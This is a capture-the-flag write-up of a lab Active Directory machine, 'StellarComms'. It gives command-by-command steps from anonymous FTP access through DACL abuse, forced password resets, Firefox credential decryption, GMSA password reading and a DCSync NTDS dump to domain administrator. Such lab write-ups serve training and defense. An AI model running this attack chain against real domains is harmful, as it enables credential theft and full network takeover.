APISEC-CON CTF May 2025 - Write-ups
Write-ups for APISEC-CON CTF May 2025 challenges.
HackSmarter Labs - StellarComms - Medium
Summary
StellarComms is a medium-difficulty Active Directory machine that demonstrates a realistic privilege escalation chain through DACL abuse and credential recovery. Initial access is gained through anonymous FTP, which leaks credentials in a user guide PDF. The junior.analyst account has WriteOwner permissions over a security group, allowing escalation to ops.controller via ForceChangePassword. From there, Firefox password recovery reveals credentials for astro.researcher, who possesses WriteDacl over eng.payload. This account can read the GMSA password of a computer account with DCSync privileges, ultimately leading to domain administrator access through NTDS dumping.
Objective / Scope
Stellar Communications, a regional telecommunications provider, has retained the Hack Smarter Red Team to conduct a covert internal network penetration test. The client is concerned about the resilience of their internal Active Directory infrastructure against insider threats and compromised VPN endpoints.
Your objective is to simulate a compromised remote worker, pivot through the internal network, and demonstrate the ability to compromise high-value targets.
Initial Access
Our initial access team has successfully established a VPN tunnel into the environment. We have identified a valid username, likely belonging to a new hire or junior staff member.
Valid User:
- Username:
junior.analyst - Password: Unknown
Recon
nmap
I’ll start with a full TCP port scan of the target:
nmap -p- -sCV 10.1.128.224
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 09-12-25 11:29AM <DIR> Docs
| 09-10-25 11:15AM <DIR> IT
|_09-10-25 11:44AM <DIR> Pics
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: stellarcomms.local)
445/tcp open microsoft-ds
<SNIP>
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (WinRM)
The scan reveals a Windows Domain Controller for the stellarcomms.local domain. Anonymous FTP is enabled, and WinRM (5985) is available for remote management.
FTP Enumeration
I’ll connect to FTP anonymously and browse the available directories:
ftp 10.1.128.224
Name: anonymous
Password:
230 User logged in.
ftp> ls -la
09-12-25 11:29AM <DIR> Docs
09-10-25 11:15AM <DIR> IT
09-10-25 11:44AM <DIR> Pics
I’ll recursively download all accessible files:
ftp> prompt off
ftp> cd Docs
ftp> binary
ftp> mget *
The Docs folder contains several PDFs and text files related to satellite communications and LEO reports. The IT folder contains a Firefox installer (Firefox might be installed on the target), and Pics contains team photos and satellite images.
Finding Initial Credentials
Examining the downloaded files, I find a password in Stellar_UserGuide.pdf:
_image.png)
The password works for:
- Username:
junior.analyst - Password:
{hidden}
Foothold as junior.analyst
BloodHound Enumeration
I’ll collect BloodHound data to map attack paths:
nxc ldap 10.1.128.224 -u 'junior.analyst' -p '{hidden}' --bloodhound --collection All --dns-server 10.1.128.224
After importing the data into BloodHound, I discover that:
_image-1.png)
junior.analysthas WriteOwner on theSTELLAROPS-CONTROLgroupSTELLAROPS-CONTROLhas ForceChangePassword overops.controllerops.controlleris a member of Remote Management Users
Shell as ops.controller
Exploiting WriteOwner
First, I’ll set myself as the owner of the STELLAROPS-CONTROL group:
bloodyAD --host 10.1.128.224 -d stellarcomms.local -u JUNIOR.ANALYST -p '{hidden}' set owner STELLAROPS-CONTROL JUNIOR.ANALYST
[+] Old owner S-1-5-21-1085439814-3345093241-3808503133-512 is now replaced by JUNIOR.ANALYST on STELLAROPS-CONTROL
Granting WriteMembers
Now I’ll grant myself WriteMembers permission on the group:
dacledit.py -action 'write' -rights 'WriteMembers' -principal 'junior.analyst' -target-dn 'CN=STELLAROPS-CONTROL,CN=USERS,DC=STELLARCOMMS,DC=LOCAL' 'stellarcomms.local'/'junior.analyst':'{hidden}'
[*] DACL modified successfully!
Adding to Group
I’ll add myself to the group:
bloodyAD --host 10.1.128.224 -d stellarcomms.local -u JUNIOR.ANALYST -p '{hidden}' add groupMember STELLAROPS-CONTROL JUNIOR.ANALYST
[+] JUNIOR.ANALYST added to STELLAROPS-CONTROL
Changing ops.controller Password
With ForceChangePassword permissions, I’ll reset the target’s password:
bloodyAD --host 10.1.128.224 -d stellarcomms.local -u junior.analyst -p '{hidden}' set password OPS.CONTROLLER 'Peixoto1234!'
[+] Password changed successfully!
WinRM Access
I can now connect via WinRM:
evil-winrm -i 10.1.128.224 -u ops.controller -p 'Peixoto1234!'
*Evil-WinRM* PS C:\Users\ops.controller\Desktop> type user.txt
FLAG[{hidden}]
Shell as astro.researcher
Firefox Password Recovery
From reading some of the documents present in the Docs folder in FTP it was fair to imply that credentials might be stored in Firefox.
_image-2.png)
Exploring the user’s profile, I find a Firefox installation with saved credentials:
*Evil-WinRM* PS C:\Users\ops.controller\AppData\Roaming\Mozilla\Firefox\Profiles> Get-ChildItem -path . -recurse -file | select-string password
I discover logins.json and key4.db in the Firefox profile directory v8mn7ijj.default-esr. I’ll download both files:
*Evil-WinRM* PS C:\Users\ops.controller\AppData\Roaming\Mozilla\Firefox\Profiles\v8mn7ijj.default-esr> download logins.json .
*Evil-WinRM* PS C:\Users\ops.controller\AppData\Roaming\Mozilla\Firefox\Profiles\v8mn7ijj.default-esr> download key4.db .
Decrypting Firefox Passwords
Using firepwd, I’ll decrypt the stored credentials:
python3 firepwd.py
password check? True
decrypting login/password pairs
http://portal.stellarcomms.local:b'astro.researcher',b'{hidden}'
The credentials are:
- Username:
astro.researcher - Password:
{hidden}
Shell as eng.payload
BloodHound Analysis
Checking BloodHound for astro.researcher, I find:
astro.researcherhas WriteDacl overeng.payload
_image-3.png)
Granting GenericAll
I’ll grant myself GenericAll permissions on the target:
bloodyAD --host 10.1.128.224 -d stellarcomms.local -u 'astro.researcher' -p '{hidden}' add genericAll 'CN=ENG PAYLOAD,CN=USERS,DC=STELLARCOMMS,DC=LOCAL' astro.researcher
[+] astro.researcher has now GenericAll on CN=ENG PAYLOAD,CN=USERS,DC=STELLARCOMMS,DC=LOCAL
Resetting Password
With GenericAll, I can reset the password:
bloodyAD --host 10.1.128.224 -d stellarcomms.local -u 'astro.researcher' -p '{hidden}' set password ENG.PAYLOAD 'Peixoto1234!'
[+] Password changed successfully
Shell as Administrator
ReadGMSAPassword Privilege
Checking BloodHound for eng.payload, I discover:
eng.payloadhas ReadGMSAPassword on theSATLINK-SERVICE$computer account
_image-4.png)
Dumping GMSA Password
I’ll retrieve the GMSA password hash:
nxc ldap 10.1.128.224 -u 'ENG.PAYLOAD' -p 'Peixoto1234!' --gmsa
LDAP 10.1.128.224 389 DC-STELLAR Account: SATLINK-SERVICE$ NTLM: {hidden}
_image-5.png)
DCSync Attack
Checking BloodHound again, SATLINK-SERVICE$ has DCSync rights over the domain. I’ll use this to dump the Administrator hash:
nxc smb 10.1.128.224 -u 'SATLINK-SERVICE$' -H '{hidden}' --ntds --user Administrator
SMB 10.1.128.224 445 DC-STELLAR [+] Dumping the NTDS...
SMB 10.1.128.224 445 DC-STELLAR Administrator:500:aad3b435b51404eeaad3b435b51404ee:{hidden}:::
Administrator Access
With the Administrator hash, I’ll authenticate via WinRM:
evil-winrm -i 10.1.128.224 -u Administrator -H {hidden}
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
{hidden}
